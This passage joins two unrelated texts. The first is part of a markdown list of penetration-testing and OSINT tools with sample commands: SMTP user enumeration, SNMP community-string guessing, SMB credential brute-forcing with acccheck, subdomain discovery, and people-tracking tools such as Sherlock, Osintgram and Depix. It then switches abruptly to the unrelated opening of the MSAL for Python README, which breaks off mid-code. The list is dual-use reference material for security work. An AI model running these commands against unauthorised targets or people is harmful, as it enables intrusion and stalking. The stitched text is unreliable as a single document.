protected] swaks --to [email protected] --server smtp.example.com ``` * [gobsuter](https://github.com/OJ/gobuster)&nbsp;&nbsp;&nbsp;[![](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/gitlab.png?token=AKLVDP5MB6RCSXS423WWIA26WYYWM)](https://github.com/OJ/gobuster)&nbsp;&nbsp;&nbsp; ``` gobuster dir -u https://buffered.io -w ~/wordlists/shortlist.txt ``` * [smtp-user-enum](https://tools.kali.org/information-gathering/smtp-user-enum)&nbsp;&nbsp;&nbsp;[![](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/gitlab.png?token=AKLVDP5MB6RCSXS423WWIA26WYYWM)](https://gitlab.com/kalilinux/packages/smtp-user-enum)&nbsp;&nbsp;&nbsp; [![watch](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/yt.png?token=AKLVDPY5647PJVN6MSLDOHS6WYYGY)](https://www.youtube.com/watch?v=BU-mCoK8emk) ``` smtp-user-enum -M VRFY -U /root/Desktop/user.txt -t 192.168.1.107 smtp-user-enum -M VRFY -u root -t 192.168.1.25 ``` * [braa](https://tools.kali.org/information-gathering/braa)&nbsp;&nbsp;&nbsp;[![](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/gitlab.png?token=AKLVDP5MB6RCSXS423WWIA26WYYWM)](https://gitlab.com/kalilinux/packages/braa)&nbsp;&nbsp;&nbsp; [![watch](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/yt.png?token=AKLVDPY5647PJVN6MSLDOHS6WYYGY)](https://www.youtube.com/watch?v=rfMXA09tk9E) ``` braa 10.253.101.1-10.253.101.254:.1.3.6.1.2.1.1.6.0 braa [email protected]:.1.3.6.* ``` * [onesixtyone](https://null-byte.wonderhowto.com/how-to/hack-like-pro-crack-private-public-snmp-passwords-using-onesixtyone-0150332/)&nbsp;&nbsp;&nbsp;[![](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/github.png?token=AKLVDP4M2RTUFTJVE5QLRV26WYYCE)](https://github.com/trailofbits/onesixtyone)&nbsp;&nbsp;&nbsp; [![watch](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/yt.png?token=AKLVDPY5647PJVN6MSLDOHS6WYYGY)](https://www.youtube.com/watch?v=8EF0X5Zz_rU) ``` onesixtyone -c dict.txt 192.168.1.119 ``` * [ssldump](https://www.systutorials.com/docs/linux/man/1-ssldump/)&nbsp;&nbsp;&nbsp;[![](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/github.png?token=AKLVDP4M2RTUFTJVE5QLRV26WYYCE)](https://github.com/adulau/ssldump)&nbsp;&nbsp;&nbsp; [![watch](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/yt.png?token=AKLVDPY5647PJVN6MSLDOHS6WYYGY)](https://www.youtube.com/watch?v=Ag920nLMsgo) ``` ssldump -i le0 port 443 ``` * [sslh](https://www.ostechnix.com/sslh-share-port-https-ssh/)&nbsp;&nbsp;&nbsp;[![](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/github.png?token=AKLVDP4M2RTUFTJVE5QLRV26WYYCE)](https://github.com/yrutschle/sslh) ``` ssh -p 443 [email protected] ``` * [sslscan](https://chousensha.github.io/blog/2017/06/24/sslscan-kali-linux-tools/)&nbsp;&nbsp;&nbsp;[![](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/github.png?token=AKLVDP4M2RTUFTJVE5QLRV26WYYCE)](https://github.com/rbsec/sslscan)&nbsp;&nbsp;&nbsp; [![watch](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/yt.png?token=AKLVDPY5647PJVN6MSLDOHS6WYYGY)](https://www.youtube.com/watch?v=PlSMtqHg-C4) ``` sslscan sail.co.in sslscan https://www.cylance.com ``` * ike-scan &nbsp;&nbsp;&nbsp;[![](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/github.png?token=AKLVDP4M2RTUFTJVE5QLRV26WYYCE)](https://github.com/royhills/ike-scan)&nbsp;&nbsp;&nbsp; [![watch](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/yt.png?token=AKLVDPY5647PJVN6MSLDOHS6WYYGY)](https://www.youtube.com/watch?v=Txw4sCnh_n8) ``` ike-scan 192.168.49.2 ``` * [legion](https://kalilinuxtutorials.com/legion-penetration-testing/)&nbsp;&nbsp;&nbsp;[![](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/github.png?token=AKLVDP4M2RTUFTJVE5QLRV26WYYCE)](https://github.com/carlospolop/legion)&nbsp;&nbsp;&nbsp; [![watch](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/yt.png?token=AKLVDPY5647PJVN6MSLDOHS6WYYGY)](https://www.youtube.com/watch?v=7MoWs5RkZpo) * [recon-ng](https://tools.kali.org/information-gathering/recon-ng)&nbsp;&nbsp;&nbsp;[![](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/github.png?token=AKLVDP4M2RTUFTJVE5QLRV26WYYCE)](https://github.com/lanmaster53/recon-ng)&nbsp;&nbsp;&nbsp; [![watch](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/yt.png?token=AKLVDPY5647PJVN6MSLDOHS6WYYGY)](https://www.youtube.com/watch?v=68rRliy5DBw) ``` recon-ng ``` * [p0f](https://tools.kali.org/information-gathering/p0f)&nbsp;&nbsp;&nbsp;[![](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/github.png?token=AKLVDP4M2RTUFTJVE5QLRV26WYYCE)](https://github.com/p0f/p0f)&nbsp;&nbsp;&nbsp; [![watch](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/yt.png?token=AKLVDPY5647PJVN6MSLDOHS6WYYGY)](https://www.youtube.com/watch?v=0I1D5SsMbOU) ``` p0f -i eth0 -p -o /tmp/p0f.log ``` * [acccheck](https://www.kalitut.com/2016/01/acccheck-kali-tools.html)&nbsp;&nbsp;&nbsp;[![](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/github.png?token=AKLVDP4M2RTUFTJVE5QLRV26WYYCE)](https://github.com/qashqao/acccheck)&nbsp;&nbsp;&nbsp; [![watch](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/yt.png?token=AKLVDPY5647PJVN6MSLDOHS6WYYGY)](https://www.youtube.com/watch?v=RkSXj5LoRkc) ``` acccheck -t IP ADDRESS acccheck -t 10.0.2.15 -U mynames.txt -P mypasswords.txt ``` * [THC-IPV6 Package](https://tools.kali.org/information-gathering/thc-ipv6)&nbsp;&nbsp;&nbsp;[![](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/gitlab.png?token=AKLVDP5MB6RCSXS423WWIA26WYYWM)](https://gitlab.com/kalilinux/packages/thc-ipv6)&nbsp;&nbsp;&nbsp; ``` address6 alive6 covert_send6 covert_send6d denial6 detect-new-ip6 detect_sniffer6 dnsdict6 dnsrevenum6 dos-new-ip6 dump_router6 exploit6 . . . . ``` * [casefile](https://tools.kali.org/information-gathering/casefile)&nbsp;&nbsp;&nbsp;[![](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/gitlab.png?token=AKLVDP5MB6RCSXS423WWIA26WYYWM)](https://gitlab.com/kalilinux/packages/casefile)&nbsp;&nbsp;&nbsp; [![watch](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/yt.png?token=AKLVDPY5647PJVN6MSLDOHS6WYYGY)](https://www.youtube.com/watch?v=sm4eiEUSzlg) ``` casefile ``` * [creepy](https://www.geocreepy.com/)&nbsp;&nbsp;&nbsp;[![watch](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/yt.png?token=AKLVDPY5647PJVN6MSLDOHS6WYYGY)](https://www.youtube.com/watch?v=fkpMa_fqRdY) * [jigsaw](http://knoxd3.blogspot.com/2013/07/how-to-use-jigsaw-in-kali-linux.html)&nbsp;&nbsp;&nbsp;[![watch](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/yt.png?token=AKLVDPY5647PJVN6MSLDOHS6WYYGY)](https://www.youtube.com/watch?v=yOAHLy_XpUs) ``` jigsaw โ€“s company name ``` * [metagoofil](https://tools.kali.org/information-gathering/metagoofil)&nbsp;&nbsp;&nbsp;[![](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/gitlab.png?token=AKLVDP5MB6RCSXS423WWIA26WYYWM)](https://gitlab.com/kalilinux/packages/metagoofil)&nbsp;&nbsp;&nbsp; [![watch](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/yt.png?token=AKLVDPY5647PJVN6MSLDOHS6WYYGY)](https://www.youtube.com/watch?v=Je0j__spZMo) ``` metagoofil -d kali.org -t pdf -l 100 -n 25 -o kalipdf -f kalipdf.html ``` * [sslcaudit](https://tools.kali.org/information-gathering/sslcaudit)&nbsp;&nbsp;&nbsp;[![](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/gitlab.png?token=AKLVDP5MB6RCSXS423WWIA26WYYWM)](https://gitlab.com/kalilinux/packages/sslcaudit)&nbsp;&nbsp;&nbsp; [![watch](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/yt.png?token=AKLVDPY5647PJVN6MSLDOHS6WYYGY)](Yhttps://www.youtube.com/watch?v=Kd-KYIpfOug) ``` sslcaudit -l 0.0.0.0:443 -v 1 ``` * [stunnel4](http://man.he.net/man8/stunnel4) ``` stunnel4 ``` * [tcpflow](https://kalilinuxtutorials.com/tcpflow/)&nbsp;&nbsp;&nbsp;[![](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/github.png?token=AKLVDP4M2RTUFTJVE5QLRV26WYYCE)](https://github.com/simsong/tcpflow)&nbsp;&nbsp;&nbsp; [![watch](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/yt.png?token=AKLVDPY5647PJVN6MSLDOHS6WYYGY)](https://www.youtube.com/watch?v=BTUB0C2zHGs) ``` tcpflow -ce host 192.168.0.100 ``` * [ace-voip](https://tools.kali.org/information-gathering/ace-voip)&nbsp;&nbsp;&nbsp;[![](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/gitlab.png?token=AKLVDP5MB6RCSXS423WWIA26WYYWM)](https://gitlab.com/kalilinux/packages/ace-voip)&nbsp;&nbsp;&nbsp; [![watch](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/yt.png?token=AKLVDPY5647PJVN6MSLDOHS6WYYGY)](https://www.youtube.com/watch?v=fL32v7P_P9U) ``` ace -i eth0 -m 00:1E:F7:28:9C:8e ace -r eth0.96 ``` * [Amap](https://tools.kali.org/information-gathering/amap)&nbsp;&nbsp;&nbsp;[![](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/github.png?token=AKLVDP4M2RTUFTJVE5QLRV26WYYCE)](https://github.com/vanhauser-thc/THC-Archive/tree/master/Tools)&nbsp;&nbsp;&nbsp; [![watch](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/yt.png?token=AKLVDPY5647PJVN6MSLDOHS6WYYGY)](https://www.youtube.com/watch?v=DsoplF1bBm4) ``` amap -bqv 192.168.1.15 80 ``` * [APT2](https://tools.kali.org/information-gathering/apt2)&nbsp;&nbsp;&nbsp;[![](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/gitlab.png?token=AKLVDP5MB6RCSXS423WWIA26WYYWM)](https://gitlab.com/kalilinux/packages/apt2)&nbsp;&nbsp;&nbsp; [![watch](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/yt.png?token=AKLVDPY5647PJVN6MSLDOHS6WYYGY)](https://gitlab.com/kalilinux/packages/apt2) ``` apt2 -h ``` * [bing-ip2hosts](https://tools.kali.org/information-gathering/bing-ip2hosts)&nbsp;&nbsp;&nbsp;[![](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/gitlab.png?token=AKLVDP5MB6RCSXS423WWIA26WYYWM)](https://gitlab.com/kalilinux/packages/bing-ip2hosts)&nbsp;&nbsp;&nbsp; [![watch](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/yt.png?token=AKLVDPY5647PJVN6MSLDOHS6WYYGY)](https://www.youtube.com/watch?v=Y9NCos8H8ac) ``` bing-ip2hosts -p microsoft.com bing-ip2hosts -p 173.194.33.80 ``` * [automater](https://tools.kali.org/information-gathering/automater)&nbsp;&nbsp;&nbsp;[![](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/gitlab.png?token=AKLVDP5MB6RCSXS423WWIA26WYYWM)](https://gitlab.com/kalilinux/packages/automater)&nbsp;&nbsp;&nbsp; [![watch](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/yt.png?token=AKLVDPY5647PJVN6MSLDOHS6WYYGY)](https://www.youtube.com/watch?v=dRAzBuijPhM) ``` automater 185.62.190.110 automater corefitness.info automater b9318a66fa7f50f2f3ecaca02a96268ad2c63db7554ea3acbde43bf517328d06 ``` * [cisco-torch](https://tools.kali.org/information-gathering/cisco-torch)&nbsp;&nbsp;&nbsp;[![](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/github.png?token=AKLVDP4M2RTUFTJVE5QLRV26WYYCE)](https://github.com/foreni-packages/cisco-torch)&nbsp;&nbsp;&nbsp; [![watch](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/yt.png?token=AKLVDPY5647PJVN6MSLDOHS6WYYGY)](https://www.youtube.com/watch?v=4OztzE5iJ2U) ``` cisco-torch -A 10.1.1.0/24 ``` * [enumIAX](https://tools.kali.org/information-gathering/enumiax)&nbsp;&nbsp;&nbsp;[![](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/gitlab.png?token=AKLVDP5MB6RCSXS423WWIA26WYYWM)](https://gitlab.com/kalilinux/packages/enumiax)&nbsp;&nbsp;&nbsp; [![watch](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/yt.png?token=AKLVDPY5647PJVN6MSLDOHS6WYYGY)](https://www.youtube.com/watch?v=fNEKla8lxak) ``` enumiax -d /usr/share/wordlists/metasploit/unix_users.txt 192.168.1.1 ``` * [EyeWitness](https://tools.kali.org/information-gathering/eyewitness)&nbsp;&nbsp;&nbsp;[![](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/github.png?token=AKLVDP4M2RTUFTJVE5QLRV26WYYCE)](https://github.com/FortyNorthSecurity/EyeWitness)&nbsp;&nbsp;&nbsp; [![watch](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/yt.png?token=AKLVDPY5647PJVN6MSLDOHS6WYYGY)](https://www.youtube.com/watch?v=2zmBhHDKjpI) ``` eyewitness -f /root/urls.txt -d screens --headless ``` * [goofile](https://tools.kali.org/information-gathering/goofile)&nbsp;&nbsp;&nbsp;[![](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/gitlab.png?token=AKLVDP5MB6RCSXS423WWIA26WYYWM)](https://gitlab.com/kalilinux/packages/goofile)&nbsp;&nbsp;&nbsp; [![watch](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/yt.png?token=AKLVDPY5647PJVN6MSLDOHS6WYYGY)](https://www.youtube.com/watch?v=UwUAEVxdJeE) ``` goofile -d kali.org -f pdf ``` * [ident-user-enum](https://tools.kali.org/information-gathering/ident-user-enum)&nbsp;&nbsp;&nbsp;[![](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/gitlab.png?token=AKLVDP5MB6RCSXS423WWIA26WYYWM)](https://gitlab.com/kalilinux/packages/ident-user-enum)&nbsp;&nbsp;&nbsp; ``` ident-user-enum 192.168.1.13 22 139 445 ``` * [inSpy](https://tools.kali.org/information-gathering/inspy)&nbsp;&nbsp;&nbsp;[![](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/github.png?token=AKLVDP4M2RTUFTJVE5QLRV26WYYCE)](https://github.com/leapsecurity/InSpy)&nbsp;&nbsp;&nbsp; [![watch](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/yt.png?token=AKLVDPY5647PJVN6MSLDOHS6WYYGY)](https://www.youtube.com/watch?v=utC1NZJnZ9s) ``` inspy -h ``` * [iSMTP](https://tools.kali.org/information-gathering/ismtp)&nbsp;&nbsp;&nbsp;[![](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/gitlab.png?token=AKLVDP5MB6RCSXS423WWIA26WYYWM)](https://gitlab.com/kalilinux/packages/ismtp) ``` ismtp ``` * [Nikto](https://tools.kali.org/information-gathering/nikto)&nbsp;&nbsp;&nbsp;[![](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/gitlab.png?token=AKLVDP5MB6RCSXS423WWIA26WYYWM)](https://gitlab.com/kalilinux/packages/nikto)&nbsp;&nbsp;&nbsp; [![watch](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/yt.png?token=AKLVDPY5647PJVN6MSLDOHS6WYYGY)](https://www.youtube.com/watch?v=K78YOmbuT48) ``` nikto -Help ``` * [ntop](https://tools.kali.org/information-gathering/ntop)&nbsp;&nbsp;&nbsp;[![](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/gitlab.png?token=AKLVDP5MB6RCSXS423WWIA26WYYWM)](https://github.com/ntop/ntopng) ``` ntop -B "src host 192.168.1.1" ``` * [Parsero](https://tools.kali.org/information-gathering/parsero)&nbsp;&nbsp;&nbsp;[![](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/github.png?token=AKLVDP4M2RTUFTJVE5QLRV26WYYCE)](https://github.com/behindthefirewalls/Parsero)&nbsp;&nbsp;&nbsp; [![watch](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/yt.png?token=AKLVDPY5647PJVN6MSLDOHS6WYYGY)](https://www.youtube.com/watch?v=WX3iq77QxtQ) ``` parsero -u www.bing.com -sb ``` * [OSRFramework](https://tools.kali.org/information-gathering/osrframework)&nbsp;&nbsp;&nbsp;[![](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/github.png?token=AKLVDP4M2RTUFTJVE5QLRV26WYYCE)](https://github.com/i3visio/osrframework)&nbsp;&nbsp;&nbsp; [![watch](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/yt.png?token=AKLVDPY5647PJVN6MSLDOHS6WYYGY)](https://www.youtube.com/watch?v=NIiUuFqxjJ8) ``` usufy.py -h mailfy.py -h searchfy.py -h domainfy.py -h phonefy.py -h entify.py -h osrfconsole.py ``` * [sublist3r](https://tools.kali.org/information-gathering/sublist3r)&nbsp;&nbsp;&nbsp;[![](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/github.png?token=AKLVDP4M2RTUFTJVE5QLRV26WYYCE)](https://github.com/aboul3la/Sublist3r)&nbsp;&nbsp;&nbsp; [![watch](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/yt.png?token=AKLVDPY5647PJVN6MSLDOHS6WYYGY)](https://www.youtube.com/watch?v=pi1VmNTdzq0) ``` sublist3r -d kali.org -t 3 -e bing sublist3r -d google.com -b -t 100 ``` * [ffuf]()&nbsp;&nbsp;&nbsp;[![](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/github.png?token=AKLVDP4M2RTUFTJVE5QLRV26WYYCE)](https://github.com/ffuf/ffuf)&nbsp;&nbsp;&nbsp; [![watch](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/yt.png?token=AKLVDPY5647PJVN6MSLDOHS6WYYGY)](https://www.youtube.com/watch?v=aN3Nayvd7FU) ``` ffuf -w /path/to/wordlist -u https://target/FUZZ ```` * [Amass]()&nbsp;&nbsp;&nbsp;[![](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/github.png?token=AKLVDP4M2RTUFTJVE5QLRV26WYYCE)](https://github.com/OWASP/Amass)&nbsp;&nbsp;&nbsp; [![watch](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/yt.png?token=AKLVDPY5647PJVN6MSLDOHS6WYYGY)](https://www.youtube.com/watch?v=C-GabM2db9A) ``` amass enum -d example.com ```` * [AQUATONE]()&nbsp;&nbsp;&nbsp;[![](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/github.png?token=AKLVDP4M2RTUFTJVE5QLRV26WYYCE)](https://github.com/michenriksen/aquatone)&nbsp;&nbsp;&nbsp; [![watch](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/yt.png?token=AKLVDPY5647PJVN6MSLDOHS6WYYGY)](https://www.youtube.com/watch?v=mnQ-TaOWctw) ``` cat targets.txt | aquatone ```` * [netscanner](https://github.com/R4yGM/netscanner)&nbsp;&nbsp;&nbsp;[![](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/github.png?token=AKLVDP4M2RTUFTJVE5QLRV26WYYCE)](https://github.com/R4yGM/netscanner) ``` netscanner sp tcp 127.0.0.1 80 ``` * [webshag](https://github.com/wereallfeds/webshag)&nbsp;&nbsp;&nbsp; ``` sudo apt-get install python-wxgtk2.8 git nmap git clone https://github.com/wereallfeds/webshag cd webshag/ ./setup.linux.py ./webshag_gui.py ``` * [PimEyes](https://pimeyes.com/en)&nbsp;&nbsp;&nbsp;[![watch](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/yt.png?token=AKLVDPY5647PJVN6MSLDOHS6WYYGY)](https://youtu.be/PKVtv_LVNhA) * [TinEye](https://tineye.com/)&nbsp;&nbsp;&nbsp;[![watch](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/yt.png?token=AKLVDPY5647PJVN6MSLDOHS6WYYGY)](https://youtu.be/I3Sbihz4vpI) * [OSINT Framework](https://osintframework.com/)&nbsp;&nbsp;&nbsp;[![github](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/github.png?token=AKLVDP4M2RTUFTJVE5QLRV26WYYCE)](https://github.com/lockfale/osint-framework)&nbsp;&nbsp;&nbsp;[![watch](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/yt.png?token=AKLVDPY5647PJVN6MSLDOHS6WYYGY)](https://youtu.be/BXF1mE8jD0M) * [Depix](https://www.linkedin.com/pulse/recovering-passwords-from-pixelized-screenshots-sipke-mellema/)&nbsp;&nbsp;&nbsp;[![github](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/github.png?token=AKLVDP4M2RTUFTJVE5QLRV26WYYCE)](https://github.com/beurtschipper/Depix)&nbsp;&nbsp;&nbsp;[![watch](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/yt.png?token=AKLVDPY5647PJVN6MSLDOHS6WYYGY)](https://youtu.be/_1Az0KwBbXc) ``` git clone https://github.com/beurtschipper/Depix.git cd Depix python -m pip install -r requirements.txt python depix.py -p /path/to/your/input/image.png -s images/searchimages/debruinseq_notepad_Windows10_closeAndSpaced.png -o /path/to/your/output.png ``` * [Osintgram](https://github.com/Datalux/Osintgram)&nbsp;&nbsp;&nbsp;[![github](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/github.png?token=AKLVDP4M2RTUFTJVE5QLRV26WYYCE)](https://github.com/Datalux/Osintgram)&nbsp;&nbsp;&nbsp;[![watch](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/yt.png?token=AKLVDPY5647PJVN6MSLDOHS6WYYGY)](https://youtu.be/NWyqSbnsvGU) ``` python3 main.py <target username> --command <command> ``` * [Sherlock](https://null-byte.wonderhowto.com/how-to/hunt-down-social-media-accounts-by-usernames-with-sherlock-0196138/)&nbsp;&nbsp;&nbsp;[![github](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/github.png?token=AKLVDP4M2RTUFTJVE5QLRV26WYYCE)](https://github.com/sherlock-project/sherlock)&nbsp;&nbsp;&nbsp;[![watch](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/yt.png?token=AKLVDPY5647PJVN6MSLDOHS6WYYGY)](https://youtu.be/HrqYGTK8-bo) ``` # clone the repo $ git clone https://github.com/sherlock-project/sherlock.git # change the working directory to sherlock $ cd sherlock # install the requirements $ python3 -m pip install -r requirements.txt # search user name python3 sherlock [user_name] ``` * [PhoneInfoga](https://null-byte.wonderhowto.com/how-to/find-identifying-information-from-phone-number-using-osint-tools-0195472/)&nbsp;&nbsp;&nbsp;[![github](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/github.png?token=AKLVDP4M2RTUFTJVE5QLRV26WYYCE)](https://github.com/sundowndev/phoneinfoga)&nbsp;&nbsp;&nbsp;[![watch](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/yt.png?token=AKLVDPY5647PJVN6MSLDOHS6WYYGY)](https://youtu.be/WW6myutKBYk) * [GHunt](https://kalilinuxtutorials.com/ghunt/)&nbsp;&nbsp;&nbsp;[![github](https://raw.githubusercontent.com/hhhrrrttt222111/Ethical-Hacking-Tools/master/0/github.png?token=AKLVDP4M2RTUFTJVE5QLRV26WYYCE)](https://github.com/mxrch/GHunt)
# Microsoft Authentication Library (MSAL) for Python | `dev` branch | Reference Docs | # of Downloads per different platforms | # of Downloads per recent MSAL versions | |---------------|---------------|----------------------------------------|-----------------------------------------| [![Build status](https://github.com/AzureAD/microsoft-authentication-library-for-python/actions/workflows/python-package.yml/badge.svg?branch=dev)](https://github.com/AzureAD/microsoft-authentication-library-for-python/actions) | [![Documentation Status](https://readthedocs.org/projects/msal-python/badge/?version=latest)](https://msal-python.readthedocs.io/en/latest/?badge=latest) | [![Downloads](https://pepy.tech/badge/msal)](https://pypistats.org/packages/msal) | [![Download monthly](https://pepy.tech/badge/msal/month)](https://pepy.tech/project/msal) The Microsoft Authentication Library for Python enables applications to integrate with the [Microsoft identity platform](https://aka.ms/aaddevv2). It allows you to sign in users or apps with Microsoft identities ([Azure AD](https://azure.microsoft.com/services/active-directory/), [Microsoft Accounts](https://account.microsoft.com) and [Azure AD B2C](https://azure.microsoft.com/services/active-directory-b2c/) accounts) and obtain tokens to call Microsoft APIs such as [Microsoft Graph](https://graph.microsoft.io/) or your own APIs registered with the Microsoft identity platform. It is built using industry standard OAuth2 and OpenID Connect protocols Not sure whether this is the SDK you are looking for your app? There are other Microsoft Identity SDKs [here](https://github.com/AzureAD/microsoft-authentication-library-for-python/wiki/Microsoft-Authentication-Client-Libraries). Quick links: | [Getting Started](https://learn.microsoft.com/azure/active-directory/develop/web-app-quickstart?pivots=devlang-python)| [Docs](https://github.com/AzureAD/microsoft-authentication-library-for-python/wiki) | [Samples](https://aka.ms/aaddevsamplesv2) | [Support](README.md#community-help-and-support) | [Feedback](https://forms.office.com/r/TMjZkDbzjY) | | --- | --- | --- | --- | --- | ## Scenarios supported Click on the following thumbnail to visit a large map with clickable links to proper samples. [![Map effect won't work inside github's markdown file, so we have to use a thumbnail here to lure audience to a real static website](https://raw.githubusercontent.com/AzureAD/microsoft-authentication-library-for-python/dev/docs/thumbnail.png)](https://msal-python.readthedocs.io/en/latest/) ## Installation You can find MSAL Python on [Pypi](https://pypi.org/project/msal/). 1. If you haven't already, [install and/or upgrade the pip](https://pip.pypa.io/en/stable/installing/) of your Python environment to a recent version. We tested with pip 18.1. 2. As usual, just run `pip install msal`. ## Versions This library follows [Semantic Versioning](http://semver.org/). You can find the changes for each version under [Releases](https://github.com/AzureAD/microsoft-authentication-library-for-python/releases). ## Usage Before using MSAL Python (or any MSAL SDKs, for that matter), you will have to [register your application with the Microsoft identity platform](https://docs.microsoft.com/azure/active-directory/develop/quickstart-v2-register-an-app). Acquiring tokens with MSAL Python follows this 3-step pattern. (Note: That is the high level conceptual pattern. There will be some variations for different flows. They are demonstrated in [runnable samples hosted right in this repo](https://github.com/AzureAD/microsoft-authentication-library-for-python/tree/dev/sample). ) 1. MSAL proposes a clean separation between [public client applications, and confidential client applications](https://tools.ietf.org/html/rfc6749#section-2.1). So you will first create either a `PublicClientApplication` or a `ConfidentialClientApplication` instance, and ideally reuse it during the lifecycle of your app. The following example shows a `PublicClientApplication`: ```python from msal import PublicClientApplication app = 